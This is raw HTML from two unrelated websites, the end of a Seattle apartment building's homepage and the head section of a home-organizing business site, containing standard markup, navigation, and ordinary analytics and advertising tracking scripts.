0%;" data-top-bottom="top: 0%; bottom: -35%;"></div> </section> <section class="video-section right-alignment"> <div class="columns clear"> <div class="column left width-55"> <div class="inside match-height"> <video autoplay loop muted preload="auto"> <source src="http://www.thedanforthseattle.com/wp-content/uploads/2018/03/FIRSTHILL_WEB_01_11.mp4" type="video/mp4"> </video> <div class="gradient"></div> </div> </div> <div class="column left width-45"> <div class="inside match-height"> <div class="content"> <div class="reveal"> <h1>Classic appeal immersed in the streets of First Hill</h1> <p><span style="font-weight: 400;">The historic neighborhood of First Hill provides a nod to Seattle’s past, while infusing the style of classic Seattle. </span></p> <p><a class="button" href="http://www.thedanforthseattle.com/v2/location/">Check out First Hill</a></p> </div> </div> </div> </div> </div> <div class="logo" data-bottom-top="background-position-y: -25%;" data-top-bottom="background-position-y: 125%;"></div> </section> <section class="photo-text-section background-white center-overlay-alignment enable-parallax"> <div class="text"> <div class="wrapper large clear"> <div class="content center reveal"> <h1>Welcome home, in the heart of it all</h1> <p><a class="button" href="http://www.thedanforthseattle.com/v2/floor-plans/">Search Availability</a></p> <p><a class="button" href="https://www.youtube.com/embed/CXVz2hq6LY0?rel=0&amp;amp;showinfo=0">Watch the Full Video</a></p> </div> </div> </div> <div class="background" style="background-image: url(http://www.thedanforthseattle.com/wp-content/uploads/2018/11/Danforth_0155_BlueOverlay.jpg);" data-bottom-top="top: -35%; bottom: 0%;" data-top-bottom="top: 0%; bottom: -35%;"></div> </section> </main> <footer> <div class="wrapper large"> <div class="columns clear"> <div class="column right width-40"> <div class="inside"> <ul class="location center"> <li><a href="https://goo.gl/maps/TGq8vrKZpv42" target="_blank">1425 Spring Street</a></li> <li class="divider">&#124;</li> <li><a href="https://goo.gl/maps/TGq8vrKZpv42" target="_blank">Seattle, WA 98104</a></li> </ul> <ul class="location center"> <li>Call: 206-207-9325</li> <li class="divider">&#124;</li> <li>Text: 206-900-9488</li> </ul> <ul class="navigation center"> <li id="menu-item-47" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47"><a href="http://www.thedanforthseattle.com/contact/">Contact</a></li> <li id="menu-item-3816" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3816"><a target="_blank" href="https://thedanforthseattle.activebuilding.com">Resident Portal</a></li> </ul> <ul class="logos"> <li> <a href="https://www.greystar.com/" target="_blank" class="image"> <img src="http://www.thedanforthseattle.com/wp-content/themes/danforth/img/logo-greystar.png" alt="Danforth" /> </a> </li> <li> <a href="https://www.greystar.com/fair-housing-statement" target="_blank"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="18.26" viewBox="0 0 16 18.26"><path d="M5.36,3.25A1.63,1.63,0,1,0,3.58,1.63a1.69,1.69,0,0,0,.2.79l.58,8.16h6l2.45,5.74L16,15.06l-.5-1.19-1.8.65L11.33,9l-5.55,0-.08-1h4V6.52H5.55Z"/><path d="M11.37,15A6.08,6.08,0,0,1,6,18.26,6,6,0,0,1,3.51,6.82l.14,1.77a4.36,4.36,0,1,0,6.67,4.18Z"/></svg></a> </li> <li> <a href="https://www.greystar.com/fair-housing-statement" target="_blank"><svg xmlns="http://www.w3.org/2000/svg" width="27" height="19" viewBox="0 0 27 19"><path d="M13.4,0,0,6.6V9.7H1.5V19H25.2V9.7H27V6.6L13.4,0Zm8.9,16.2H4.4V7.7l9-4.6,8.9,4.6v8.5Zm-4.65-5.5H9.35v-3h8.3v3Zm0,4.3H9.35V12h8.3v3Z"/></svg></a> <a href="https://www.greystar.com/fair-housing-statement" target="_blank">Equal Housing Opportunity</a> </li> </ul> </div> </div> <div class="column left width-40"> <div class="inside"> <ul class="social-media center"> <li> <a href="https://www.facebook.com/thedanforthapartments/" target="_blank"> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="24" viewBox="0 0 12 24"><path d="M3,8H0v4H3V24H8V12h3.64L12,8H8V6.33C8,5.38,8.19,5,9.11,5H12V0H8.19C4.6,0,3,1.58,3,4.61Z"/></svg> </a> </li> <li> <a href="https://twitter.com/thedanforthsea" target="_blank"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg> </a> </li> <li> <a href="https://www.instagram.com/thedanforthapartments/" target="_blank"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg> </a> </li> </ul> <h3 class="center no-margin">Connect with The Danforth</h3> <ul class="credits center"> <li> <a href="http://columbiapacific.com" target="_blank"> <svg xmlns="http://www.w3.org/2000/svg" width="40.2" height="44" viewBox="0 0 40.2 44"><path d="M25.3 12.7H13.9v20.8h4.5v-8.1h6.9c3.5 0 6.3-2.8 6.3-6.3V19c0-3.5-2.8-6.3-6.3-6.3zm1.7 6.4c0 1-.8 1.8-1.8 1.8h-6.9v-3.7h6.9c1 0 1.8.8 1.8 1.8v.1z"/><path d="M22 39.8c-9.8 0-17.8-8-17.8-17.8S12.2 4.2 22 4.2c6.4 0 12 3.4 15.2 8.5l3.1-3.1C36.3 3.8 29.6 0 22 0 9.9 0 0 9.9 0 22s9.9 22 22 22c7.6 0 14.2-3.8 18.2-9.6l-3.1-3.1c-3.1 5.1-8.7 8.5-15.1 8.5z"/> </svg> </a> </li> <li>&copy; 2019 Columbia Pacific. <a href="https://www.greystar.com/privacy/us-policy%20" target="_blank">Privacy Policy</a>. <a href="https://www.greystar.com/terms-of-use#Copyright%20Infringement%20Policy" target="_blank">DMCA Agent</a>. Website: <a href="http://deicreative.com" target="_blank">DEI</a></li> </ul> </div> </div> </div> <p class="screening center">We do not accept Comprehensive Reusable Tenant Screening Reports as defined by and pursuant to RCW 59.18. Section 8 and other subsidy programs welcome. <a href="http://www.thedanforthseattle.com/wp-content/themes/danforth/pdf/RQA - Seattle 3X - 02.01.2018.pdf" target="_blank">Download More Information</a></p> </div> </footer> <script type='text/javascript' src='http://www.thedanforthseattle.com/wp-content/themes/danforth/js/scripts.js?ver=4.9.10'></script> <script type='text/javascript' src='http://www.thedanforthseattle.com/wp-content/themes/danforth/js/init.js?ver=4.9.10'></script> <script type='text/javascript' src='http://www.thedanforthseattle.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <!-- Start of Signal Tag Manager - Digital Marketing - Please Do Not Remove --> <script id="tagjs" type="text/javascript"> (function () { var tagjs = document.createElement("script"); var s = document.getElementsByTagName("script")[0]; tagjs.async = true; tagjs.src = "//s.btstatic.com/tag.js#site=j69jpLV"; s.parentNode.insertBefore(tagjs, s); }()); </script> <noscript> <iframe src="//s.thebrighttag.com/iframe?c=j69jpLV" width="1" height="1" frameborder="0" scrolling="no" marginheight="0" marginwidth="0"></iframe> </noscript> <!-- End of Signal Tag Manager - Digital Marketing - Please Do Not Remove --> <!-- Google Code for Conversion Code for Tracking Number Conversion Page --> <script type="text/javascript"> /* <![CDATA[ */ var google_conversion_id = 809620707; var google_conversion_label = "8wNvCIe_7n8Q46mHggM"; var google_remarketing_only = false; /* ]]> */ </script> <script type="text/javascript" src="//www.googleadservices.com/pagead/conversion.js"> </script> <noscript> <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/809620707/?label=8wNvCIe_7n8Q46mHggM&amp;guid=ON&amp;script=0"/> </div> </noscript> <!-- End of Google Conversion Code - Digital Marketing - Please Do Not Remove --> </body> </html> <div class="pop-up" id="reserve" style="padding: 50px; display: none;"> <form action="http://www.thedanforthseattle.com/wp-content/themes/danforth/inc/email.php" method="post"> <h4>Tell Us About Yourself</h4> <input type="hidden" name="url" value="http://www.thedanforthseattle.com/" /> <input type="hidden" name="subject" value="Danforth :: Reserve" /> <input type="text" name="name" placeholder="Name" /> <input type="text" name="email" placeholder="Email" /> <input type="text" name="phone" placeholder="Phone" /> <input type="text" name="date" placeholder="Desired Move In" /> <label>Desired Apartment</label> <label class="checkbox"><input type="checkbox" name="apartment[]" value="Studio" />Studio</label> <label class="checkbox"><input type="checkbox" name="apartment[]" value="1 Bedroom" />1 Bedroom</label> <label class="checkbox"><input type="checkbox" name="apartment[]" value="2 Bedroom" />2 Bedroom</label> <label class="checkbox"><input type="checkbox" name="apartment[]" value="Penthouse" />Penthouse</label> <input type="submit" name="submit" value="Submit" /> </form> </div>
0
<!doctype html> <!--[if lt IE 7]><html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js lt-ie9 lt-ie8 lt-ie7"><![endif]--> <!--[if (IE 7)&!(IEMobile)]><html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js lt-ie9 lt-ie8"><![endif]--> <!--[if (IE 8)&!(IEMobile)]><html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js lt-ie9"><![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js"><!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Home | Shira Gill Home</title> <meta name="HandheldFriendly" content="True"> <meta name="MobileOptimized" content="320"> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="apple-touch-icon" href="https://shiragill.com/wp-content/themes/SimplySorted/library/images/apple-icon-touch.png?=1"> <link rel="icon" href="https://shiragill.com/wp-content/themes/SimplySorted/favicon.png"> <!--[if IE]> <link rel="shortcut icon" href="https://shiragill.com/wp-content/themes/SimplySorted/favicon.ico"> <![endif]--> <meta name="msapplication-TileColor" content="#f1d5d2"> <meta name="msapplication-TileImage" content="https://shiragill.com/wp-content/themes/SimplySorted/library/images/shira-favicon.png"> <link href='https://fonts.googleapis.com/css?family=Oswald:400,700' rel='stylesheet' type='text/css'> <link href='https://d2xu5rov9xeppt.cloudfront.net/sorted/animate.min.css' rel='stylesheet' type='text/css'> <link href="https://shiragill.com/wp-content/themes/SimplySorted/library/css/jquery.bxslider.css" rel="stylesheet" /> <link rel="pingback" href="https://shiragill.com/xmlrpc.php"> <!--- Bootstrap Core CSS --> <link href="https://shiragill.com/wp-content/themes/SimplySorted/library/css/bootstrap.min.css" rel="stylesheet"> <!-- TypeKit Font Script --> <script src="https://use.typekit.net/ddu2hta.js"></script> <script>try{Typekit.load({ async: true });}catch(e){}</script> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Muli" rel="stylesheet"> <!-- This site is optimized with the Yoast SEO plugin v11.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://shiragill.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Shira Gill Home" /> <meta property="og:description" content="Shira Gill Home is a holistic home organizing company that merges principles of minimalism with life coaching, organization, and thoughtful styling." /> <meta property="og:url" content="https://shiragill.com/" /> <meta property="og:site_name" content="Shira Gill Home" /> <meta property="og:image" content="https://shiragill.com/wp-content/uploads/2018/09/closet-makeover.png" /> <meta property="og:image:secure_url" content="https://shiragill.com/wp-content/uploads/2018/09/closet-makeover.png" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://shiragill.com/#website","url":"https://shiragill.com/","name":"Shira Gill Home","publisher":{"@id":"https://shiragill.com/#person"},"potentialAction":{"@type":"SearchAction","target":"https://shiragill.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://shiragill.com/#webpage","url":"https://shiragill.com/","inLanguage":"en-US","name":"Home | Shira Gill Home","isPartOf":{"@id":"https://shiragill.com/#website"},"about":{"@id":"https://shiragill.com/#person"},"datePublished":"2017-10-21T04:43:00+00:00","dateModified":"2019-01-10T18:37:43+00:00"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Shira Gill Home &raquo; Feed" href="https://shiragill.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Shira Gill Home &raquo; Comments Feed" href="https://shiragill.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"wpemoji":"https:\/\/shiragill.com\/wp-includes\/js\/wp-emoji.js","twemoji":"https:\/\/shiragill.com\/wp-includes\/js\/twemoji.js"}}; /** * @output wp-includes/js/wp-emoji-loader.js */ ( function( window, document, settings ) { var src, ready, ii, tests; // Create a canvas element for testing native browser support of emoji. var canvas = document.createElement( 'canvas' ); var context = canvas.getContext && canvas.getContext( '2d' ); /** * Checks if two sets of Emoji characters render the same visually. * * @since 4.9.0 * * @private * * @param {number[]} set1 Set of Emoji character codes. * @param {number[]} set2 Set of Emoji character codes. * * @return {boolean} True if the two sets render the same. */ function emojiSetsRenderIdentically( set1, set2 ) { var stringFromCharCode = String.fromCharCode; // Cleanup from previous test. context.clearRect( 0, 0, canvas.width, canvas.height ); context.fillText( stringFromCharCode.apply( this, set1 ), 0, 0 ); var rendered1 = canvas.toDataURL(); // Cleanup from previous test. context.clearRect( 0, 0, canvas.width, canvas.height ); context.fillText( stringFromCharCode.apply( this, set2 ), 0, 0 ); var rendered2 = canvas.toDataURL(); return rendered1 === rendered2; } /** * Detects if the browser supports rendering emoji or flag emoji. * * Flag emoji are a single glyph made of two characters, so some browsers * (notably, Firefox OS X) don't support them. * * @since 4.2.0 * * @private * * @param {string} type Whether to test for support of "flag" or "emoji". * * @return {boolean} True if the browser can render emoji, false if it cannot. */ function browserSupportsEmoji( type ) { var isIdentical; if ( ! context || ! context.fillText ) { return false; } /* * Chrome on OS X added native emoji rendering in M41. Unfortunately, * it doesn't work when the font is bolder than 500 weight. So, we * check for bold rendering support to avoid invisible emoji in Chrome. */ context.textBaseline = 'top'; context.font = '600 32px Arial'; switch ( type ) { case 'flag': /* * Test for UN flag compatibility. This is the least supported of the letter locale flags, * so gives us an easy test for full support. * * To test for support, we try to render it, and compare the rendering to how it would look if * the browser doesn't render it correctly ([U] + [N]). */ isIdentical = emojiSetsRenderIdentically( [ 55356, 56826, 55356, 56819 ], [ 55356, 56826, 8203, 55356, 56819 ] ); if ( isIdentical ) { return false; } /* * Test for English flag compatibility. England is a country in the United Kingdom, it * does not have a two letter locale code but rather an five letter sub-division code. * * To test for support, we try to render it, and compare the rendering to how it would look if * the browser doesn't render it correctly (black flag emoji + [G] + [B] + [E] + [N] + [G]). */ isIdentical = emojiSetsRenderIdentically( [ 55356, 57332, 56128, 56423, 56128, 56418, 56128, 56421, 56128, 56430, 56128, 56423, 56128, 56447 ], [ 55356, 57332, 8203, 56128, 56423, 8203, 56128, 56418, 8203, 56128, 56421, 8203, 56128, 56430, 8203, 56128, 56423, 8203, 56128, 56447 ] ); return ! isIdentical; case 'emoji': /* * She's the hero Emoji deserves, but not the one it needs right now. * * To test for support, try to render a new emoji (female superhero), * then compare it to how it would look if the browser doesn't render it correctly * (superhero + female sign) . */ isIdentical = emojiSetsRenderIdentically( [55358, 56760, 9792, 65039], [55358, 56760, 8203, 9792, 65039] ); return ! isIdentical; } return false; } /** * Adds a script to the head of the document. * * @ignore * * @since 4.2.0 * * @param {Object} src The url where the script is located. * @return {void} */ function addScript( src ) { var script = document.createElement( 'script' ); script.src = src; script.defer = script.type = 'text/javascript'; document.getElementsByTagName( 'head' )[0].appendChild( script ); } tests = Array( 'flag', 'emoji' ); settings.supports = { everything: true, everythingExceptFlag: true }; /* * Tests the browser support for flag emojis and other emojis, and adjusts the * support settings accordingly. */ for( ii = 0; ii < tests.length; ii++ ) { settings.supports[ tests[ ii ] ] = browserSupportsEmoji( tests[ ii ] ); settings.supports.everything = settings.supports.everything && settings.supports[ tests[ ii ] ]; if ( 'flag' !== tests[ ii ] ) { settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && settings.supports[ tests[ ii ] ]; } } settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && ! settings.supports.flag; // Sets DOMReady to false and assigns a ready function to settings. settings.DOMReady = false; settings.readyCallback = function() { settings.DOMReady = true; }; // When the browser can not render everything we need to load a polyfill. if ( ! settings.supports.everything ) { ready = function() { settings.readyCallback(); }; /* * Cross-browser version of adding a dom ready event. */ if ( document.addEventListener ) { document.addEventListener( 'DOMContentLoaded', ready, false ); window.addEventListener( 'load', ready, false ); } else { window.attachEvent( 'onload', ready ); document.attachEvent( 'onreadystatechange', function() { if ( 'complete' === document.readyState ) { settings.readyCallback(); } } ); } src = settings.source || {}; if ( src.concatemoji ) { addScript( src.concatemoji ); } else if ( src.wpemoji && src.twemoji ) { addScript( src.twemoji ); addScript( src.wpemoji ); } } } )( window, document, window._wpemojiSettings ); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='mpsp-custom-style-css' href='https://shiragill.com/wp-content/plugins/testimonial-add/css/custom_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='mpsp-style-css' href='https://shiragill.com/wp-content/plugins/testimonial-add/owl-carousel/owl.carousel.css' type='text/css' media='all' /> <link rel='stylesheet' id='mpsp_theme-css' href='https://shiragill.com/wp-content/plugins/testimonial-add/owl-carousel/owl.theme.css' type='text/css' media='all' /> <link rel='stylesheet' id='mpsp_transitions-css' href='https://shiragill.com/wp-content/plugins/testimonial-add/owl-carousel/owl.transitions.css' type='text/css' media='all' /> <link rel='stylesheet' id='mp-theme-css' href='https://shiragill.com/wp-content/plugins/memberpress/css/ui/theme.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://shiragill.com/wp-includes/css/dist/block-library/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='affwp-forms-css' href='https://shiragill.com/wp-content/plugins/affiliate-wp/assets/css/forms.css' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://shiragill.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /> <link rel='stylesheet' id='cookie-notice-front-css' href='https://shiragill.com/wp-content/plugins/cookie-notice/css/front.css' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://shiragill.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='jpibfi-style-css' href='https://shiragill.com/wp-content/plugins/jquery-pin-it-button-for-images/css/client.css' type='text/css' media='all' /> <link rel='stylesheet' id='if-menu-site-css-css' href='https://shiragill.com/wp-content/plugins/if-menu/assets/if-menu-site.css' type='text/css' media='all' /> <link rel='stylesheet' id='fancybox-css' href='https://shiragill.com/wp-content/plugins/easy-fancybox/css/jquery.fancybox.1.3.23.min.css' type='text/css' media='screen' /> <link rel='stylesheet' id='bxslider-css-css' href='https://shiragill.com/wp-content/themes/SimplySorted/library/css/jquery.bxslider.css' type='text/css' media='all' /> <link rel='stylesheet' id='bones-stylesheet-css' href='https://shiragill.com/wp-content/themes/SimplySorted/library/css/style.css' type='text/css' media='all' /> <!--[if lt IE 9]> <link rel='stylesheet' id='bones-ie-only-css' href='https://shiragill.com/wp-content/themes/SimplySorted/library/css/ie.css' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='sharedaddy-css' href='https://shiragill.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.css' type='text/css' media='all' /> <link rel='stylesheet' id='social-logos-css' href='https://shiragill.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='googleFonts-css' href='http://fonts.googleapis.com/css?family=Lato%3A400%2C700%2C400italic%2C700italic' type='text/css' media='all' /> <script type='text/javascript' src='https://shiragill.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-includes/js/jquery/jquery-migrate.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-content/plugins/testimonial-add/owl-carousel/owl.carousel.js'></script> <script type='text/javascript' src='https://shiragill.com/wp-content/themes/SimplySorted/library/js/libs/modernizr.custom.min.js'></script> <link rel='https://api.w.org/' href='https://shiragill.com/wp-json/' /> <link rel='shortlink' href='https://wp.me/P35O9D-14p' /> <link rel="alternate" type="application/json+oembed" href="https://shiragill.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fshiragill.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://shiragill.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fshiragill.com%2F&#038;format=xml" /> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window,document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1967493079945945'); fbq('track', 'PageView'); </script> <noscript> <img height="1" width="1" src="https://www.facebook.com/tr?id=1967493079945945&ev=PageView &noscript=1"/> </noscript> <!-- End Facebook Pixel Code --><style type="text/css"> a.pinit-button.custom span { } .pinit-hover { opacity: 0.8 !important; filter: alpha(opacity=80) !important; } a.pinit-button { border-bottom: 0 !important; box-shadow: none !important; margin-bottom: 0 !important; } a.pinit-button::after { display: none; }</style> <script type='text/javascript' data-cfasync='false'>var _mmunch = {'front': false, 'page': false, 'post': false, 'category': false, 'author': false, 'search': false, 'attachment': false, 'tag': false};_mmunch['front'] = true;_mmunch['page'] = true; _mmunch['pageData'] = {"ID":4117,"post_name":"new-home","post_title":"Home","post_type":"page","post_author":"2","post_status":"publish"};</script><script data-cfasync="false" src="//a.mailmunch.co/app/v1/site.js" id="mailmunch-script" data-plugin="mc_mm" data-mailmunch-site-id="336437" async></script> <script type="text/javascript"> var AFFWP = AFFWP || {}; AFFWP.referral_var = 'ref'; AFFWP.expiration = 30; AFFWP.debug = 0; AFFWP.referral_credit_last = 1; </script> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style><link rel="icon" href="https://shiragill.com/wp-content/uploads/2019/01/SG-Reduced-125x125.jpg" sizes="32x32" /> <link rel="icon" href="https://shiragill.com/wp-content/uploads/2019/01/SG-Reduced.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://shiragill.com/wp-content/uploads/2019/01/SG-Reduced.jpg" /> <meta name="msapplication-TileImage" content="https://shiragill.com/wp-content/uploads/2019/01/SG-Reduced.jpg" /> <!-- BEGIN ExactMetrics v5.3.7 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-122318268-1', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-12293709-13', 'auto'); ga('send', 'pageview'); </script> <script type="text/javascript"> window.heap=window.heap||[],heap.load=function(t,e){window.heap.appid=t,window.heap.config=e;var a=document.createElement("script");a.type="text/javascript",a.async=!0,a.src=("https:"===document.location.protocol?"https:":"https:")+"//cdn.heapanalytics.com/js/heap.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(a,n);for(var o=function(t){return function(){heap.push([t].concat(Array.prototype.slice.call(arguments,0)))}},p=["clearEventProperties","identify","setEventProperties","track","unsetEventProperty"],c=0;c<p.length;c++)heap[p[c]]=o(p[c])}; heap.load("1051255506"); </script> <!-- Pinterest Code --> <meta name="p:domain_verify" content="dd2afce416edde2f0dfc5617c3527c00"/> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1967493079945945'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1967493079945945&ev=PageView&noscript=1" /></noscript> <!-- End Facebook Pixel Code --> </head> <body class="home page-template page-template-page-newhome page-template-page-newhome-php page page-id-4117 cookies-not-set"> <div class="container-fluid featured-strip"> <div class="row"> <div class="col-sm-12"> <!--NAVBAR--> <div class="navbar-wrapper"> <div class="navbar" role="navigation"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div><!--navbar-header--> <nav class="navbar-collapse collapse"><ul id="menu-main" class="nav navbar-nav"><li id="menu-item-6735" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6735"><a href="https://shiragill.com/start-here/">Start Here</a></li> <li id="menu-item-7412" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7412"><a href="https://shiragill.com/closet-makeover/">Virtual</a></li> <li id="menu-item-6024" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6024"><a href="https://shiragill.com/services/">In Person</a></li> <li id="menu-item-5436" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5436"><a href="https://shiragill.com/about/">About</a></li> <li id="menu-item-6816" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6816"><a href="https://shiragill.com/blog/">Blog</a></li> <li id="menu-item-6934" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6934"><a href="https://shiragill.com/login/">Login</a></li> </ul></nav> </div><!--navbar--> </div><!--navbar-wrapper--> </div> </div> </div> <header class="header" role="banner"> <div class="container page-header-row"> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <p id="logo" class="h1"><a href="https://shiragill.com" rel="nofollow"><img src="https://shiragill.com/wp-content/uploads/2017/10/sg-logo-clear.png"></a></p> </div> <div class="col-sm-3"> <p id="book-now" class="h1"><a class="" href="https://shiragill.com/start-here/"><img src="https://shiragill.com/wp-content/uploads/2018/12/SG-5MinuteMakeover-Button.jpg"></a></p> </div> </div> <!-- Modal Window --> <div class="fancybox-hidden" style="display: none;"> <div id="contact_form_pop_head"><div role="form" class="wpcf7" id="wpcf7-f2433-o1" lang="en-US" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f2433-o1" method="post" 